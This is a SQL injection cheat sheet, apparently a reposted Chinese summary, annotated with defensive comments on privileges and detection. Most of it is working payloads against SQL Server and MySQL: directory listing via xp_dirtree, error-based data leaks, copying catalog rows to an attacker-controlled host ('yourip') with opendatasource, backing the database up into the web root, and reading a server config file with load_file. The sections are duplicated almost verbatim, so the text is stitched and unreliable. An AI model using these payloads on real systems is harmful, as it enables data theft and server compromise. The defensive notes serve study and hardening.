Some useful techniques in sql injection [个人总结简洁版]
-- Section 1 (SQL Server / T-SQL). Each step below only works because the
-- injected statement runs with far more privilege than a web application
-- login needs: DDL, extended stored procedures, outbound distributed queries
-- and BACKUP. Parameterized queries remove the injection point; a
-- least-privilege login and the per-feature settings noted below remove the
-- preconditions even if one slips through.
1.a. create table dirs (dir varchar(100),dirid int)
-- xp_dirtree is an extended stored procedure that lists a filesystem path
-- (the Chinese literal is the author's placeholder for the drive/directory;
-- the trailing ’ is a mis-encoded quote from the original post, not syntax).
-- Defender check: EXEC of xp_* procedures by the application login is a
-- clear audit signal, and the CREATE TABLE above shows that login holds DDL.
insert dirs exec xp_dirtree '想获取该目录的磁盘'’
declare @dir varchar(500)
-------
-- b. Two ways to read the collected rows back one value at a time.
--    (1) Concatenate every row into @dir, then `select 1+@dir`: adding an
--        int to a varchar raises a conversion error whose message carries
--        the text. This channel only exists when raw database errors reach
--        the client -- return generic error pages and log the detail server-side.
b. set @dir=''
select @dir=@dir+dir+':'+ltrim(str(dirid))+'|' from dirs where dir>@dir
select 1+@dir
------or
--    (2) Add an identity column and page through rows with TOP/ORDER BY.
--        `top[1,2,3...]` is the author's notation for varying the count, not
--        valid syntax; T is the derived-table alias.
alter table dirs add num int identity constraint num primary key
select top 1 dir from ( select top[1,2,3...] dir,num from dirs) T order by num desc
-- c. opendatasource(...) opens an outbound connection from the database
--    server to 'yourip' (placeholder for a host the author controls) and
--    copies catalog rows there. It needs 'Ad Hoc Distributed Queries' enabled
--    (disabled by default on modern SQL Server) plus outbound TCP/1433 from
--    the DB host; block the former in sp_configure and the latter at the
--    firewall, and alert on egress from database servers. The trailing --
--    comments out whatever followed the injection point in the original query.
c. create table tmptable ( name char(200),id int not null)
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmptable select [name],[id] from sysobjects where xtype='U' --
-- `where 1=2` is always false, so this creates an empty table with
-- syscolumns' structure to receive the copy on the next line.
select * into [tmpcolumns]from syscolumns where 1=2
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmpcolumns select name from syscolumns where id=' the id of table you wanna know'
-- BACKUP DATABASE to a path under the web root (the Chinese literal is the
-- placeholder for the site's absolute path) makes the whole database
-- downloadable over HTTP. Preconditions a defender can remove: BACKUP
-- DATABASE permission on the application login, and write access for the SQL
-- Server service account to the web directory -- it should have neither.
declare @a sysname; set @a=db_name();backup database @a to disk='网站的绝对路径';--// e.g. e:/web/down.bak;--
2.
-- Section 2: enumerating the SQL Server system catalog. The TOP n / ORDER BY
-- id DESC pattern walks user tables (xtype='U') one row per request;
-- repeated single-row reads of sysobjects/syscolumns from the application
-- login are a detection signal worth alerting on. On the SQL Server
-- versions of this era the catalog was broadly readable, so permissions on
-- it are not the fix -- keeping untrusted input out of the statement is.
select top 1 name from (select top 2 name,id from sysobjects where xtype='U') T order by id desc
select top 2 name,id from sysobjects where xtype='U'
-- db_id/db_name map database names to ids and back, letting other databases
-- on the instance be listed.
select db_id('master')
select db_name(17)
-- col_name(object id, ordinal) returns column names by position; `[1,2,..]`
-- is the author's notation for stepping the ordinal. The Chinese literal is
-- the placeholder for the table name.
select col_name(oject_id('你要获取字段的表名'),[1,2,..])
-- Identity of the current session. If an injected query shows the web
-- application running as sa/dbo, that over-privileged login is itself the
-- finding to remediate.
select current_user,user,user_name(),system_user
-- Cursor-based walk over user table names; same catalog exposure as above.
DECLARE m scroll CURSOR FOR
select name from sysobjects where xtype='U'
open m
DEALLOCATE m
fetch first from m
3.http://www.itlearner.com/work/hexsql.asp //a useful link for encoding character sets
http://whois.webhosting.info
-- Section 4: conditional expressions in three dialects, the building block
-- of blind (true/false) probing when no data is echoed back:
--   CASE ... WHEN ... END   -- ANSI / SQL Server
--   iif(asc(mid(...)))      -- Access/JET; `admin` and `username` are the
--                              author's example names. The unbalanced `)` is
--                              as posted.
--   if(STRCMP(...))         -- MySQL
-- Blind probing produces long runs of near-identical requests that differ
-- in one comparison; rate/shape anomalies on a single parameter are the
-- detection handle, input parameterization the fix.
4.select case 1+1 when 1 then '1' else '0' end;
select top 1 iif(asc(mid(username,1,1))>96,1,username) from admin)>0
select if(STRCMP('net0r','netor1'),'not netor','is netor');
-- MySQL: load_file() reads a server-side file (path supplied as char()
-- codes to avoid quoting) and INTO OUTFILE writes the result under the web
-- root. Both require the FILE privilege, which an application account should
-- never hold; secure_file_priv confines or disables file access entirely.
-- `user` here is the author's example table, not mysql.user.
SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile 'c:/web/cfg.txt'
-- Section 1 (SQL Server / T-SQL), repeated from above. Each step only works
-- because the injected statement runs with far more privilege than a web
-- application login needs: DDL, extended stored procedures, outbound
-- distributed queries and BACKUP. Parameterized queries remove the
-- injection point; a least-privilege login and the per-feature settings
-- noted below remove the preconditions.
-- xp_dirtree is an extended stored procedure that lists a filesystem path
-- (the Chinese literal is the author's placeholder for the drive/directory;
-- the trailing ’ is a mis-encoded quote from the original post). Inserting
-- its output presupposes the login could create the dirs table (step 1.a).
-- Defender check: EXEC of xp_* procedures by the application login.
insert dirs exec xp_dirtree '想获取该目录的磁盘'’
declare @dir varchar(500)
-------
-- b. Two ways to read the collected rows back one value at a time.
--    (1) Concatenate every row into @dir, then `select 1+@dir`: adding an
--        int to a varchar raises a conversion error whose message carries
--        the text. This channel only exists when raw database errors reach
--        the client -- return generic error pages and log the detail server-side.
b. set @dir=''
select @dir=@dir+dir+':'+ltrim(str(dirid))+'|' from dirs where dir>@dir
select 1+@dir
------or
--    (2) Add an identity column and page through rows with TOP/ORDER BY.
--        `top[1,2,3...]` is the author's notation for varying the count, not
--        valid syntax; T is the derived-table alias.
alter table dirs add num int identity constraint num primary key
select top 1 dir from ( select top[1,2,3...] dir,num from dirs) T order by num desc
-- c. opendatasource(...) opens an outbound connection from the database
--    server to 'yourip' (placeholder for a host the author controls) and
--    copies catalog rows there. It needs 'Ad Hoc Distributed Queries' enabled
--    (disabled by default on modern SQL Server) plus outbound TCP/1433 from
--    the DB host; block the former in sp_configure and the latter at the
--    firewall, and alert on egress from database servers. The trailing --
--    comments out whatever followed the injection point in the original query.
c. create table tmptable ( name char(200),id int not null)
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmptable select [name],[id] from sysobjects where xtype='U' --
-- `where 1=2` is always false, so this creates an empty table with
-- syscolumns' structure to receive the copy on the next line.
select * into [tmpcolumns]from syscolumns where 1=2
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmpcolumns select name from syscolumns where id=' the id of table you wanna know'
-- BACKUP DATABASE to a path under the web root (the Chinese literal is the
-- placeholder for the site's absolute path) makes the whole database
-- downloadable over HTTP. Preconditions a defender can remove: BACKUP
-- DATABASE permission on the application login, and write access for the SQL
-- Server service account to the web directory -- it should have neither.
declare @a sysname; set @a=db_name();backup database @a to disk='网站的绝对路径';--// e.g. e:/web/down.bak;--
2.
-- Section 2 (repeated): enumerating the SQL Server system catalog. The TOP n
-- / ORDER BY id DESC pattern walks user tables (xtype='U') one row per
-- request; repeated single-row reads of sysobjects/syscolumns from the
-- application login are a detection signal worth alerting on. On the SQL
-- Server versions of this era the catalog was broadly readable, so
-- permissions on it are not the fix -- keeping untrusted input out of the
-- statement is.
select top 1 name from (select top 2 name,id from sysobjects where xtype='U') T order by id desc
select top 2 name,id from sysobjects where xtype='U'
-- db_id/db_name map database names to ids and back, letting other databases
-- on the instance be listed.
select db_id('master')
select db_name(17)
-- col_name(object id, ordinal) returns column names by position; `[1,2,..]`
-- is the author's notation for stepping the ordinal. The Chinese literal is
-- the placeholder for the table name.
select col_name(oject_id('你要获取字段的表名'),[1,2,..])
-- Identity of the current session. If an injected query shows the web
-- application running as sa/dbo, that over-privileged login is itself the
-- finding to remediate.
select current_user,user,user_name(),system_user
-- Cursor-based walk over user table names; same catalog exposure as above.
DECLARE m scroll CURSOR FOR
select name from sysobjects where xtype='U'
open m
DEALLOCATE m
fetch first from m
3.http://www.itlearner.com/work/hexsql.asp //a useful link for encoding character sets
http://whois.webhosting.info
-- Section 4 (repeated): conditional expressions in three dialects, the
-- building block of blind (true/false) probing when no data is echoed back:
--   CASE ... WHEN ... END   -- ANSI / SQL Server
--   iif(asc(mid(...)))      -- Access/JET; `admin` and `username` are the
--                              author's example names. The unbalanced `)` is
--                              as posted.
--   if(STRCMP(...))         -- MySQL
-- Blind probing produces long runs of near-identical requests that differ
-- in one comparison; rate/shape anomalies on a single parameter are the
-- detection handle, input parameterization the fix.
4.select case 1+1 when 1 then '1' else '0' end;
select top 1 iif(asc(mid(username,1,1))>96,1,username) from admin)>0
select if(STRCMP('net0r','netor1'),'not netor','is netor');
-- MySQL: load_file() reads a server-side file (path supplied as char()
-- codes to avoid quoting) and INTO OUTFILE writes the result under the web
-- root. Both require the FILE privilege, which an application account should
-- never hold; secure_file_priv confines or disables file access entirely.
-- `user` here is the author's example table, not mysql.user.
SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile 'c:/web/cfg.txt'